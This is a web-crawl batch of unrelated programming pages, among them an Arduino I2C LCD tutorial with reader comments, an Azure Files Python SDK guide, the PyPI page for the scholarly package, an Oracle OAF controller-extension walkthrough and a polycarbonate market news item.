AuthServiceas well in addition to freezing
PayPalas the
CreditService. One alternative will be to define another abstraction as
paypalPaymentthrough partial application of
RealPaymentwhere we close both the parameters. A better option will be to reuse the
paypalPaymentabstraction and use explicit function currying. Like ..
scala> val paypalPaymentCurried = Function.curried(paypalPayment)
paypalPaymentCurried: (AuthService) => (java.util.Date) => (Int) => RealPayment = <function>
and closing it partially using the
DefaultAuthimplementation ..
scala> val paypalPaymentWithDefaultAuth = paypalPaymentCurried(DefaultAuth("foo"))
paypalPaymentWithDefaultAuth: (java.util.Date) => (Int) => RealPayment = <function>
The rest of the module can now treat this as an abstraction that uses
PayPalfor
CreditServiceand
DefaultAuthfor
AuthService. Like Guice we can have hierarchies of modules that injects these settings and publishes a more specialized abstraction to downstream clients.
|
http://debasishg.blogspot.com/2010/02/
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
I2C LCD Controller (the Easy Way)
Introduction: I2C LCD Controller (the Easy Way)
I am working on an alarm/weather station project and I wanted to use an LCD but dint want to have a lot of wires so I order a controller. This is just a very basic tutorial on how to hook it up, for the beginners like my self.
Step 1: Parts
Parts list:
1. LCD in this case a 16x02
1. I2C 1602 LCD Controller ($1.99 on ebay free shipping)
4. Jumper wires
1. Arduino ( I have a mega)
Step 2: Soldering
Now we solder the LCD and the controller. make sure you have the correct pin arrangement. Mine doesn't have a mark for pin one, but I just looked at the 5+ and GND inputs to figure it out.
Step 3: Connecting
it is very simple to connect only 4 wire 5+ and GND and SDA goes to Arduino pin 20 and SCL to pin 21 on my arduino mega. depending on what you have it might be different.
Step 4: The Code
Since the seller doesn't provide any info I neede to find the address for the module so I ran an = 1;() {}
Step 5: The Code Part II
the code is very simple..................................but you are going to need F Malpartida's LCD LIB Once again very basic very simple.
#include <Wire.h>
#include <LCD.h>
#include <LiquidCrystal_I2C.h> // F Malpartida's NewLiquidCrystal library
#define I2C_ADDR 0x20 // Define I2C Address for controller
);
void setup()
{
lcd.begin (16,2); // initialize the lcd
// Switch on the backlight
lcd.setBacklightPin(BACKLIGHT_PIN,NEGATIVE);
lcd.setBacklight(LED_ON);
}
void loop()
{
// Reset the display
lcd.clear();
delay(1000);
lcd.home();
// Print on the LCD
lcd.backlight();
lcd.setCursor(0,0);
lcd.print("Hello, world!");
delay(8000);
}
Guys,
If any of you are struggling, I have found that some LCD modules have a different pinout on the 16 way connector. I am using a 20x4 RT204-1 Version 3 LCD Module (blue characters with built in backlight).
After a considerable amount of head-scratching and looking at datasheets, I came up with the following, which DOES work on my Arduino UNO with the RT204-1 20x4 module. Note that the pin numbers in the #defines are different in my code from the code published in the article.
Some I2C LCD driver modules have definable addresses. Please see the attached photo. If your unit is like mine, it will have three pads, marked A0, A1, and A2. The idea is you can short out the links (using soldered on jumper wire, or even better, solder on some header pins and use links. The header pins just fit on the solder pads). It seems these address pins are tied HIGH (1) if they are not connected (so linking them will take them low (0)). Hence the address of my LCD module, with no links on the address pins is 0x27, as shown in the code below.
Maybe this will help.
Regards
Mark
#include <Wire.h>
#include <LCD.h>
#include <LiquidCrystal_I2C.h> // F Malpartida's NewLiquidCrystal library
#define I2C_ADDR 0x27 // Define I2C Address for controller
#define En_pin 2
#define Rw_pin 1
#define Rs_pin 0
#define D4_pin 4
#define D5_pin 5
#define D6_pin 6
#define D7_pin 7
#define BACKLIGHT 3
LiquidCrystal_I2C lcd(I2C_ADDR,En_pin,Rw_pin,Rs_pin,D4_pin,D5_pin,D6_pin,D7_pin);
void setup()
{
lcd.begin (20,4); // initialize the lcd
// Switch on the backlight
lcd.setBacklightPin(BACKLIGHT,POSITIVE);
lcd.setBacklight(HIGH);
}
void loop()
{
// Reset the display
lcd.clear();
delay(1000);
lcd.home();
// Print on the LCD
lcd.backlight();
lcd.setCursor(0,0);
lcd.print("Hello Isla from Dad!");
delay(1000);
}
Thank You Mark!
I was scratching my head as well.
I have a 16x2 display on a Mega 2560 which seems to work on the same principal as your 20x4.
I had to change the "lcd.begin (20,4);" to "lcd.begin (16,2);"
The actual pinout of the LCD module is not different. What is different is how the PCF8574 8 pin output port is wired to the LCD pins. That is what the parameters in the constructor are configuring.
You could try using my hd44780 library instead.
It will automatically locate the i2c address and auto configure the pin mappings.
It can be quickly and easily installed using the IDE library manger and you can read more about it here:
Thanks, very helpful!
Markwills, i have the same kind like yours although I am not able to display any text. Can u please help ASAP
Adjust the contrast pot on the back until you see text
Thanks!
Not Working out for me and my Arduino Pro Mini... HELP. Cannot find LCD Address
Does it work with 1604 as well?
why using port 0 thru 6, when using the I2C interface???
Salve ma come devo fare se alla fine della scritta si accenda i led???? non ci riesco...
The code to search I2C address is awesome...Very Helpfull!
were can you find the LCD.H Library
You need to install this library
good question
check this site...
having lot of info on these I2C devices. I2C ADDRESS SCANNER is a cool one, you can find the address of your display with this
Two days and all I get is white boxes..
same on the Uno and Nano..
I am over it..
We need more info what controller and what lcd are you using. It sounds to me like your backlight is out of adjustment.
The DF Robot display works fine (only tested on the Nano) with a certain program but the other thing doesn't work at all on both my Nano or Uno, just a blue led backlight and white boxes.
How did you solve this?
I found that the white boxes were a result of the contrast control being set wrong, once I figured that out it worked for me.
send me your code and I will take a look at it for you. I am working on a four line display using the I2C and have been sending text to easy.
Really thanks!! The address are diferent!! 27 and 3F
Great help!!
Guys no text, only light is present. Any suggesstions
First thing THANKS EVERYONE FOR YOUR CONTRIBUTIONS!!
I finally got it working thanks to your help!!
markwills, it was your code that finally worked.
Now what /why are the pins defined?
#define En_pin 2
#define Rw_pin 1
#define Rs_pin 0
#define D4_pin 4
#define D5_pin 5
#define D6_pin 6
#define D7_pin 7
#define BACKLIGHT 3
How would they be used?
Thanks again,
Ralph
i come alltime i try test "Hello wordl" text same, proplem lcd show only "H" letter not more and second row have "heart" not more. what have wrong at library ?
i understand that the backlight polarity can be combined in the lcd initialisation:
lcd(I2C_ADDR,En_pin,Rw_pin,Rs_pin,D4_pin,D5_pin,D6_pin,D7_pin, POSITIVE);
lcd(I2C_ADDR,En_pin,Rw_pin,Rs_pin,D4_pin,D5_pin,D6_pin,D7_pin,BACKLIGHT_PIN, POSITIVE);
yes you are fully right. tnx
Yes you are correct, its all about the efficiency of the code the way you have it it is much better and the way is suppose to be done. but for the lack of time and knowledge I used a different method. Thank you for pointing it out, if it wasn't for you I would have never given a second thought and looked at that library again. Thanks
For some reason it uploads but nothing happens and it says;
Multiple libraries were found for "LCD.h"
Used: C:\Users\-\Documents\Arduino\libraries\fmalpartida-new-liquidcrystal-bb6d545c00c3
Not used: C:\Users\-\Documents\Arduino\libraries\NewliquidCrystal
Not used: C:\Users\-\Documents\Arduino\libraries\NewliquidCrystal
Not used: C:\Users\-\Documents\Arduino\libraries\NewliquidCrystal
Not used: C:\Users\-\Documents\Arduino\libraries\NewliquidCrystal
do we need both parts of the code?
Really helpful guide for a project I'm testing at the moment, Thanks!
need help...
when scanning the serial addres i2c
Just change you baud rate onn the serial monitor to 115200 you have it as 9600
Your baud rate is wrong should
Serial.begin (115200);
OK not so simple for me. What do I do with the code in step 4? Obviously I run the code in step 5 but where do I get the download F Malpartida's LCD LIB that you make reference to in step 5? Have a look in the URL you provided that says has the file we need, there is no such file there. Whats the name of the zip file I'm suppose to download it's definitely not LCD LIB?
Please advise me...
Thanks
depending on the version of the IDE that you are running. if you have the newest version you can use the library manager to install the library.....Open the IDE and click to the "Sketch" menu and then IncludeLibrary > Manage Libraries. if you are using an older version all you have to do is unzip the files and copy the folder to you library folder........
you can download it form the top link.
You know,
Anyone that's reading this can answer my question below or the one VasaS asked over a year ago. It looks like the guy that posted this just gave up answering questions or just doesn't bother coming around anymore. So if anyone reads this and if you know the answers then by all means jump in to answer.
Thanks
jes
How did you find the pin values bellow?
#define BACKLIGHT_PIN 7
#define En_pin 4
#define Rw_pin 5
#define Rs_pin 6
#define D4_pin 0
#define D5_pin 1
#define D6_pin 2
#define D7_pin 3
Are they the pin numbers on the actual controller that are plugged into the lcd?
If they are how did you find those values?
It's the pinout value of the i2c device connected to the screen.
yes, I am using an lcd with a Hitachi HD44780 driver if you look at the picture with the pinout you will see the values.
Well, it is working! Pay attention on contrast adjusting on the back of the I2C... I thought that LCD is not working because I didn't see any chars. :D
THIS.
I lost some minutes believing I had some strange display or controller or that one or both of them were defective, but as soon as I adjusted the contrast the darn thing worked like a charm as per turbiny code.
I thought that potentiometer was for backlight at first so I didn't really give it much attention.
just posting maybe someone will need this
i ordered from aliexpress and this is the code the worked after a week of trying:
i did altered some comments
/* YourDuino.com Example Software Sketch
20 character 4 line I2C Display
Backpack Interface labelled "LCM1602 IIC A0 A1 A2"
terry@yourduino.com */
/*-----( Import needed libraries )-----*/
#include <Wire.h> // Comes with Arduino IDE
// Get the LCD I2C Library here:
//...
// Move any other LCD libraries to another folder or delete them
// See Library "Docs" folder for possible commands etc.
#include <LiquidCrystal_I2C.h>
/*-----( Declare Constants )-----*/
//none
/*-----( Declare objects )-----*/
// set the LCD address to LiquidCrystal_I2C lcd(0x27, 2, 1, 0, 4, 5, 6, 7, 3, POSITIVE); for a 16 chars 2 line display
//
/*-----( Declare Variables )-----*/
//none
void setup() /*----( SETUP: RUNS ONCE )----*/
{
Serial.begin(9600); // Used to type in characters
lcd.begin(16,2); // initialize the lcd for 16 chars 2 lines and turn on backlight
// ------- Quick 3 blinks of backlight -------------
for(int i = 0; i< 3; i++)
{
lcd.backlight();
delay(250);
lcd.noBacklight();
delay(250);
}
lcd.backlight(); // finish with backlight on
//-------- Write characters on the display ----------------
// NOTE: Cursor Position: CHAR, LINE) start at 0
lcd.setCursor(2,0); //Start at character 4 on line 0
lcd.print("hello BEBUSH!");
delay(1000);
lcd.setCursor(2,1);
lcd.print("WE <3 YOU");
delay(1000);
lcd.setCursor(0,2);
lcd.print("16by2 Line Display");
lcd.setCursor(0,2);
delay(2000);
lcd.print("");
delay(8000);
// Wait and then tell user they can start the Serial Monitor and type in characters to
// Display. (Set Serial Monitor option to "No Line Ending")
lcd.setCursor(0,0); //Start at character 0 on line 0
lcd.print("Start Serial Monitor");
lcd.setCursor(0,1);
lcd.print("Type chars 2 display");
}/*--(end setup )---*/
void loop() /*----( LOOP: RUNS CONSTANTLY )----*/
{
{
// when characters arrive over the serial port...
if (Serial.available()) {
// wait a bit for the entire message to arrive
delay(100);
// clear the screen
lcd.clear();
// read all the available characters
while (Serial.available() > 0) {
// display each character to the LCD
lcd.write(Serial.read());
}
}
}
}/* --(end main loop )-- */
/* ( THE END ) */
Get some compilation error saying "POSITIVE" was not declated in this scope =/
I founded address of my I2C and I used your code but all I god was 3 blinks and than only empty backlited display...
Thank you, your code works! Saved me a week I guess :)
Glad i was helpful
I had to search many sites/forums until i found what worked
|
http://www.instructables.com/id/I2C-LCD-Controller-the-easy-way/
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
Tip
Try the Microsoft Azure Storage Explorer
Microsoft Azure Storage Explorer is a free, standalone app from Microsoft that enables you to work visually with Azure Storage data on Windows, macOS, and Linux.
About this tutorial
This tutorial will demonstrate the basics of using Python to develop applications or services that use Azure Files to store file data. In this tutorial, we will create a simple console application and show how to perform basic actions with Python and Azure Files:
- Create Azure File shares
- Create directories
- Enumerate files and directories in an Azure File share
- Upload, download, and delete a file
Note
Because Azure Files may be accessed over SMB, it is possible to write simple applications that access the Azure File share using the standard Python I/O classes and functions. This article will describe how to write applications that use the Azure Storage Python SDK, which uses the Azure Files REST API to talk to Azure Files.-file package.
Install via PyPi
To install via the Python Package Index (PyPI), type:
pip install azure-storage-file.
Set up your application to use Azure Files
Add the following near the top of any Python source file in which you wish to programmatically access Azure Storage.
from azure.storage.file import FileService
Set up a connection to Azure Files
The
FileService object lets you work with shares, directories and files. The following code creates a
FileService object using the storage account name and account key. Replace
<myaccount> and
<mykey> with your account name and key.
file_service = FileService(account_name='myaccount', account_key='mykey')
Create an Azure File share
In the following code example, you can use a
FileService object to create the share if it doesn't exist.
file_service.create_share('myshare')
Create a directory
You can also organize storage by putting files inside sub-directories instead of having all of them in the root directory. Azure Files allows you to create as many directories as your account will allow. The code below will create a sub-directory named sampledir under the root directory.
file_service.create_directory('myshare', 'sampledir')
Enumerate files and directories in an Azure File)
Upload a file
Azure File'))
Download a file')
Create share snapshot (preview)
You can create a point in time copy of your entire file share.
snapshot = file_service.snapshot_share(share_name) snapshot_id = snapshot.snapshot
Create share snapshot with metadata
metadata = {"foo": "bar"} snapshot = file_service.snapshot_share(share_name, metadata=metadata)
List shares and snapshots
You can list all the snapshots for a particular share.
shares = list(file_service.list_shares(include_snapshots=True))
Browse share snapshot
You can browse content of each share snapshot to retrieve files and directories from that point in time.
directories_and_files = list(file_service.list_directories_and_files(share_name, snapshot=snapshot_id))
Get file from share snapshot
You can download a file from a share snapshot for your restore scenario.
with open(FILE_PATH, 'wb') as stream: file = file_service.get_file_to_stream(share_name, directory_name, file_name, stream, snapshot=snapshot_id)
Delete a single share snapshot
You can delete a single share snapshot.
file_service.delete_share(share_name, snapshot=snapshot_id)
Delete share when share snapshots exist
A share that contains snapshots cannot be deleted unless all the snapshots are deleted first.
file_service.delete_share(share_name, delete_snapshots=DeleteSnapshot.Include)
Next steps
Now that you've learned how to manipulate Azure Files with Python, follow these links to learn more.
|
https://docs.microsoft.com/en-us/azure/storage/files/storage-python-how-to-use-file-storage
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
scholarly 0.1.3
Simple access to Google Scholar authors and citations
scholarly.py is a module that allows you to retrieve author and publication information from Google Scholar in a friendly, Pythonic way.
Usage
Because scholarly does not use an official API, no key is required. Simply:
import scholarly print scholarly.search_author('Steven A. Cholewiak').next()
Methods
- search_author – Search for an author by name and return a generator of Author objects.
>>> search_query = scholarly.search_author('Manish Singh') >>> print search_query.next() {'_filled': False, 'affiliation': u'Rutgers University, New Brunswick, NJ', 'citedby': 2283, 'email': u'@ruccs.rutgers.edu', 'id': '9XRvM88AAAAJ', 'interests': [u'Human perception', u'Computational Vision', u'Cognitive Science'], 'name': u'Manish Singh', 'url_citations': '/citations?user=9XRvM88AAAAJ&hl=en', 'url_picture': '/citations/images/avatar_scholar_150.jpg'}
- search_keyword – Search by keyword and return a generator of Author objects.
>>> search_query = scholarly.search_keyword('Haptics') >>> print search_query.next() {'_filled': False, 'affiliation': u'Stanford University', 'citedby': 18625, 'email': u'@cs.stanford.edu', 'id': '4arkOLcAAAAJ', 'interests': [u'Robotics', u'Haptics', u'Human Motion'], 'name': u'Oussama Khatib', 'url_citations': '/citations?user=4arkOLcAAAAJ&hl=en', 'url_picture': '/citations/images/avatar_scholar_150.jpg'}
- search_pubs_query – Search for articles/publications and return generator of Publication objects.
>>> search_query = scholarly.search_pubs_query('Perception of physical stability and center of mass of 3D objects') >>> print search_query.next() {'_filled': False, 'bib': {'abstract': u'Humans can judge from vision alone whether an object is physically stable or not. Such judgments allow observers to predict the physical behavior of objects, and hence to guide their motor actions. We investigated the visual estimation of physical stability of 3-D ...', 'author': u'SA Cholewiak and RW Fleming and M Singh', 'eprint': u'', 'title': u'Perception of physical stability and center of mass of 3-D objects', 'url': u''}, 'source': 'scholar', 'url_scholarbib': u'/scholar.bib?q=info:K8ZpoI6hZNoJ:scholar.google.com/&output=citation&hl=en&ct=citation&cd=0'}
Example
Here’s a quick example demonstrating how to retrieve an author’s profile then retrieve the titles of the papers that cite his most popular (cited) paper.
>>> # Retrieve the author's data, fill-in, and print >>> search_query = scholarly.search_author('Steven A Cholewiak') >>> author = search_query.next().fill() >>> print author >>> # Print the titles of the author's publications >>> print [pub.bib['title'] for pub in author.publications] >>> # Take a closer look at the first publication >>> pub = author.publications[0].fill() >>> print pub >>> # Which papers cited that publication? >>> print [citation.bib['title'] for citation in pub.citedby()]
Installation
Use pip:
pip install scholarly
Or clone the package:
git clone
Requirements
Requires bibtexparser, Beautiful Soup, and python-dateutil.
Changes
Note that because of the nature of web scraping, this project will be in perpetual alpha.
v0.1.3
- Raise an exception when we receive a Bot Check. Reorganized test.py alphabetically and updated its test cases. Reorganized README. Added python-dateutil as installation requirement, for some reason it was accidentally omitted.
v0.1.2
- Now request HTTPS connection rather than HTTP and update test.py to account for a new “Zucker”. Also added information for the v0.1.1 revision.
v0.1.1
- Fixed an issue with multi-page Author results, author entries with no citations (which are rare, but do occur), and added some tests using unittest.
v0.1
- Initial release.
License
The original code that this project was forked from was released by Bello Chalmers under a WTFPL license. In keeping with this mentality, all code is released under the Unlicense.
- Author: Steven A. Cholewiak
- Download URL:
- Keywords: Google Scholar,academics,citations
- License: Unlicense
- Categories
- Package Index Owner: scholewiak
- DOAP record: scholarly-0.1.3.xml
|
https://pypi.python.org/pypi/scholarly/0.1.3
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
I've been working on a project off and on in SDL for a number of months now, and I've had an issue from the start that I recently had some time to try and debug. I've been developing on Windows XP until this past week, so it was not really an issue until now.
Basically, my SDL bases game works perfectly fine on any Windows XP machine (ie. normal frame rate, shaders work no problem), but I initially noticed that if I ran the executable on Windows 7, the frame rate would only be 10-15 for no reason (on super high-end machines, ie. Phenom II X6 / 5970) but this was strictly a Windows 7 issue as indicated by testing on several different machines. Upon further investigation I realized that if I run the game from within Visual Studio 2008 on a Windows 7 machine it works perfectly (ie. 7000+ FPS w/o vsync), but as soon as I ran it from the executable instead, the frame rate would once again be between 10 and 15, and if shaders were being used via GLEW, the program would simply exit because GLEW 2.0 was unavailable.
tldr; SDL OpenGL game, works fine on XP, on Win7 works fine in VS2008 but EXE limited to 10 fps and shaders wont work
Honestly not sure what the issue could possibly be and has been baffling me for some time. If anyone has any suggestions or input, it would be greatly appreciated. It almost seems like SDL is somehow switching to software mode or some limited version of OpenGL. Also worth mentioning that the only things being rendered is some text (generated and rendered via lists) and a very simple skybox with 1024x1024 textures for each side.
My game is using SDLmain and a number of libraries, including:
SDL
SDL_ttf
GLEW
FreeImage
Qt
FMOD Ex
FBX SDK
Bullet Physics
Thanks for reading. Some code, if it helps any:
Main.cpp:
#include "Game.h" int main(int argc, char * argv[]) { Game * game = new Game(); if(!game->init()) { return -1; } game->run(); delete game; return 0; }
OpenGL Setup:
bool Game::init() { if(m_initialized) { return false; } settings->load(); if(SDL_Init(SDL_INIT_VIDEO | SDL_INIT_TIMER | SDL_INIT_JOYSTICK) == -1) { return false; } SDL_GL_SetAttribute(SDL_GL_DOUBLEBUFFER, 1); SDL_GL_SetAttribute(SDL_GL_SWAP_CONTROL, settings->verticalSync ? 1 : 0); m_graphics = SDL_SetVideoMode(settings->windowWidth, settings->windowHeight, 0, SDL_OPENGL | (settings->fullScreen ? SDL_FULLSCREEN : 0)); SDL_WM_SetCaption("Game", NULL); QString iconPath; iconPath.append(QString("%1/Icons/Block.bmp").arg(settings->dataDirectoryName)); QByteArray iconPathBytes = iconPath.toLocal8Bit(); m_icon = SDL_LoadBMP(iconPathBytes.data()); SDL_WM_SetIcon(m_icon, NULL); glShadeModel(GL_SMOOTH); glClearColor(0.0f, 0.0f, 0.0f, 0.0f); glClearDepth(1.0f); glEnable(GL_DEPTH_TEST); glEnable(GL_TEXTURE_2D); glEnable(GL_BLEND); glDepthFunc(GL_LEQUAL); glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA); glHint(GL_PERSPECTIVE_CORRECTION_HINT, GL_NICEST); glMatrixMode(GL_MODELVIEW); glViewport(0, 0, settings->windowWidth, settings->windowHeight); if(glewInit() != GLEW_OK) { return false; } if(!GLEW_VERSION_2_0) { return false; } etc.
Game Loop:
void Game::run() { if(!m_initialized) { return; } m_running = true; SDL_Event event; static unsigned int lastTime = SDL_GetTicks(); unsigned int currentTime = SDL_GetTicks(); do { if(SDL_PollEvent(&event)) { switch(event.type) { case SDL_KEYDOWN: if(!console->isActive()) { menu->handleInput(event); } if(!menu->isActive()) { console->handleInput(event); } break; case SDL_MOUSEMOTION: if(!console->isActive() && !menu->isActive() && SDL_GetAppState() & SDL_APPMOUSEFOCUS && SDL_GetAppState() & SDL_APPINPUTFOCUS && SDL_GetAppState() & SDL_APPACTIVE) { camera->handleInput(event); } break; case SDL_QUIT: m_running = false; break; default: break; } } if(m_running) { currentTime = SDL_GetTicks(); update(currentTime - lastTime); draw(); lastTime = currentTime; } } while(m_running); }
|
http://www.gamedev.net/topic/620879-sdl-super-slow-framerate-on-windows-7-glew-shaders-unavailable/?forceDownload=1&_k=880ea6a14ea49e853634fbdc5015a024
|
CC-MAIN-2015-18
|
en
|
refinedweb
|
Controller Extension in OAF
By PRajkumar on Jul 15, 2012
Oracle does not recommend that customers extend controller objects associated with regions or webbeans in shipped E-Business Suite product pages.
Controller class (oracle.apps.fnd.framework.webui.OAControllerImpl) methods should effectively be considered private, since their implementation is subject to change. Controller extensions are therefore not considered to be durable between upgrades.
If it is absolutely essential to handle custom form submit events on a shipped product page, processFormRequest() is the only method that should be overriden in a controller class, although the risks outlined above still apply.
Let us try to Extend Controller in OAF Page –
Create one search page as explained in below link –
In this exercise I am going to extend CO of SearchPG. First lets create CO for SearchPG.
Right Click PageLayoutRN under SearchPG page > Set New Controller
Package Name -- prajkumar.oracle.apps.fnd.searchdemo.webui
Class Name -- SearchCO
Now we will extend this newly created CO under this exercise.
The purpose of this exercise is to modify the VO query of results table. I have changed the Column1 and Column2 fields Property Selective Search Criteria as False.
Now when we click on Go button all the records are displaying in the results table and our OBJECTIVE is to bind the VO query of results table in such a way that in result Column1 value val5 and Column2 value val6 should not come as result on click Go button
Now for knowing which controller to extend we click on "About This Page" Link and select Expand All. Here we can see the Name of the controller that we need to extend
1. Create a New Workspace and Project
File > New > General > Workspace Configured for Oracle Applications
File Name – PrajkumarCOExtensionDemo
Automatically a new OA Project will also be created
Project Name -- COExtensionDemo
Default Package -- prajkumar.oracle.apps.fnd.coextensiondemo class
3. Write below logic in ExtendedCO Java Class
package prajkumar.oracle.apps.fnd.coextensiondemo.webui;
import prajkumar.oracle.apps.fnd.searchdemo.webui.SearchCO;
import oracle.apps.fnd.framework.webui.OAPageContext;
import oracle.apps.fnd.framework.webui.beans.OAWebBean;
import oracle.apps.fnd.framework.OAApplicationModule;
import oracle.apps.fnd.framework.webui.beans.layout.OAQueryBean;
import prajkumar.oracle.apps.fnd.searchdemo.server.SearchVOImpl;
public class XXItemSearchCO extends ItemSearchCO
{
public XXItemSearchCO()
{
}
public void processFormRequest(OAPageContext pageContext, OAWebBean webBean)
{
super.processFormRequest(pageContext, webBean);
OAApplicationModule am = pageContext.getApplicationModule(webBean);
OAQueryBean queryBean = (OAQueryBean)webBean.findChildRecursive("QueryRN");
//Capturing Go Button ID
String go = queryBean.getGoButtonName();
//If its Not NULL which mean user has pressed "Go" Button
if(pageContext.getParameter(go)!=null)
{
// Setting whereClause at Runtime to restrict the query
SearchVOImpl vo = (SearchVOImpl)am.findViewObject("SearchVO1");
vo.setWhereClause(null);
vo.setWhereClause("Column1 <>:1 AND Column2 <>:2");
vo.setWhereClauseParam(0,"val5");
vo.setWhereClauseParam(1,"val6");
}
}
}
4. Attach new controller to SearchPG through personalization
Click on Personalize Page link on top right hand side of your page
Note -- If you are not able to see this link then go through below link –
Click on Complete View -> Expand All -> Click on personalize icon next to Page Layout
Now at site level give the path of extended controller as we are extending the controller at SITE LEVEL
prajkumar.oracle.apps.fnd.coextensiondemo.webui.ExtendedCO
Click Apply -> Return to Application
5. Congratulation you have successfully finished. Run Your SearchPG page and Test Your Work
Click Go
Note – Record with Column1 value val5 and Column2 value val6 is not coming in result
|
https://blogs.oracle.com/prajkumar/entry/controller_extension_in_oaf
|
CC-MAIN-2015-18
|
en
|
refinedweb
|
Normalizing arguments
Discussion in 'Python' started by Dan Ellis, Oct 17, 2008.,200
- Chris Smith
- Jan 12, 2005
Normalizing XHTML with XMLRyan Stewart, May 11, 2006, in forum: XML
- Replies:
- 3
- Views:
- 438
- Ryan Stewart
- May 11, 2006
Normalizing tm structure past 2038Stu, Oct 31, 2003, in forum: C Programming
- Replies:
- 5
- Views:
- 496
- Chris Torek
- Nov 1, 2003
What is normalizing in XML?, Apr 9, 2007, in forum: Java
- Replies:
- 1
- Views:
- 393
- Joshua Cranmer
- Apr 9, 2007
XSLT: Normalizing namespacesThomas Wittek, Aug 30, 2007, in forum: XML
- Replies:
- 5
- Views:
- 1,322
- Martin Honnen
- Aug 31, 2007
|
http://www.thecodingforums.com/threads/normalizing-arguments.640348/
|
CC-MAIN-2015-18
|
en
|
refinedweb
|
ot::VRPNSource Class ReferenceVRPN client interface node.
More...
[Network Classes]
#include <VRPNSource.h>
Inheritance diagram for ot::VRPNSource:
Detailed DescriptionVRPN client interface node.
Connects to a VRPN server and reports incoming tracking data.
- Author:
- Gerhard Reitmayr
Definition at line 81 of file VRPNSource.h.
Member Enumeration Documentation
type of connection
- Enumerator:
-
Definition at line 87 of file VRPNSource.h.
Constructor & Destructor Documentation
constructor method,sets commend member
Definition at line 101 of file VRPNSource.cxx.
destructor
Definition at line 110 of file VRPNSource.cxx.
References trackerObj.
Member Function Documentation
tests for EventGenerator interface being present.
Is overriden to return 1 always.
- Returns:
- always 1
Reimplemented from ot::Node.
Definition at line 115 of file VRPNSource.h.
Executes the vrpn object's mainloop.
Only for internal use by the associated module.
Definition at line 141 of file VRPNSource.cxx.
References trackerObj.
Opens connection to the VRPN server.
Only for internal use by the associated module.
Definition at line 119 of file VRPNSource.cxx.
References BUTTON, buttonChangeCallback(), name, TRACKER, trackerObj, trackerPosOriCallback(), and type.
Friends And Related Function Documentation
Definition at line 123 of file VRPNSource.h.
Member Data Documentation
event object for data flow
Definition at line 91 of file VRPNSource.h.
name
Reimplemented from ot::Node.
Definition at line 85 of file VRPNSource.h.
Referenced by ot::VRPNModule::createNode(), and start().
station number of station to report
Definition at line 89 of file VRPNSource.h.
Referenced by ot::VRPNModule::createNode().
data pointer to underlying vrpn object
Definition at line 96 of file VRPNSource.h.
Referenced by mainloop(), start(), and ~VRPNSource().
type of connection
Reimplemented from ot::Node.
Referenced by ot::VRPNModule::createNode(), and start().
The documentation for this class was generated from the following files:
|
http://studierstube.icg.tugraz.at/opentracker/html/classot_1_1VRPNSource.php
|
CC-MAIN-2015-18
|
en
|
refinedweb
|
15 July 2011 06:38 [Source: ICIS news]
By Liu Xin
SHANGHAI (ICIS)--Asian polycarbonate (PC) prices may continue falling for the rest of the year because of sluggish demand and plummeting values of feedstock bisphenol A (BPA), industry sources said on Friday.
Spot PC prices have shed $200-300/tonne (€142-213/tonne) since early April to $2,950-3,050/tonne CIF (cost, insurance and freight) ?xml:namespace>
In the key
“Demand from
Export orders also weakened because of a stronger Chinese currency, sources said.
Suppliers are pinning their hopes on a demand recovery in September, when orders for the year-end holidays flow in. However, it remains to be seen if any demand recovery could materialise given a gloomy economic outlook, industry players said.
“The [PC price] downtrend will continue in August, and even in the fourth quarter, given the sharp falls in feedstock BPA numbers,” said a northeast Asian trader.
BPA spot prices plunged $300/tonne or 13% over the past two weeks to settle at $2,000-2,030/tonne CFR (cost and freight)
This has further dampened the appetite of PC buyers, which are sidelined because of falling prices.
“Price declines are inevitable next moth,” said a PC maker, adding that margins remain under pressure despite falling feedstock costs.
Margins have been squeezed in the first half of the year, particularly for optical grade PC, because of ample supply and stiff price competition, market sources said.
The spread between BPA and PC had narrowed to $600-800/tonnes, which was considered unhealthy by industry players. A preferred spread should be over $800/tonne.
Although PC suppliers have yet to recoup eroded margins, they are expected to cut prices further in the wake of prevailing weak market conditions.
Regional supply is expected to increase soon, when operations at Formosa Idemitsu Petrochemical Corp’s (FIPC) PC plant in Mailiao fully resumes this month and with fresh cargoes expected from Saudi Basic Industries Corp’s (SABIC) 260,000 tonne/year PC plant at Al Jubail, Saudi Arabia.
FIPC’s three production lines in
“The market is bearish. Buyers prefer to keep inventory at minimum level as supply is long while demand is weak,” a China-based trader said.
PC is a type of high specification engineering plastic, suitable for moulding and with a high resistance. Typical applications include automobiles, CDs and DVDs, electronic casings, returnable milk bottles, lighting and greenhouses.
($1 = €0
|
http://www.icis.com/Articles/2011/07/15/9477369/asia-pc-to-remain-on-downtrend-on-weak-demand-bpa-slump.html
|
CC-MAIN-2015-18
|
en
|
refinedweb
|
Hi i've been trying to figure out where to find the biggest number in an array. I know how to find the biggest number but i need to find out where the biggest number is, like which row or whatever it's in.
Code :
import java.util.Scanner; public class array { public static void main (String args[]) { Scanner keyboard = new Scanner(System.in); int r[] = new int[50]; int n=0; int x, bigSoFar; System.out.print("Enter list: "); x = keyboard.nextInt(); while( x!= -999); { r[n] = x; n++; x = keyboard.nextInt(); } for(int k = 0; k < n; k++) if(r[k]> bigSoFar) { bigSoFar = r[k]; } System.out.println(r[k]); } }
Although first i'm having trouble trying to get my first code to work, i keep getting this error
array.java:34: error: cannot find symbol
System.out.println(r[k]);
^
symbol: variable k
location: class array
1 error
|
http://www.javaprogrammingforums.com/%20whats-wrong-my-code/29005-how-find-where-biggest-number-array-printingthethread.html
|
CC-MAIN-2015-18
|
en
|
refinedweb
|
The blog of the F# team at Microsoft
In this blog post, I show off a number of F# integration features in Visual Studio 2012, by walking through an end-to-end scenario of authoring and testing an F# library. The code itself is not the focus; rather, I’ll focus on the IDE tooling as we walk through the scenario. In the end, we’ll have a small application and library supported by unit tests, but along the way we’ll also learn more about a smattering of IDE features including online project templates and NuGet. I expect there will be something new everyone can learn from this blog, regardless of whether you’re an F# novice or an experienced Visual Studio developer. So let’s get to it!
In Visual Studio, when you want to create a new application or library, you start by selecting ‘New Project’, which brings up the New Project Dialog (NPD). The NPD is filled with a variety of project templates, which help you create starter projects that contain basic project files, references, and sometimes some starter source code, in order to make it easy to get off the ground for various scenarios. In Visual Studio 2012, the NPD comes with 5 F# project templates, pictured below.
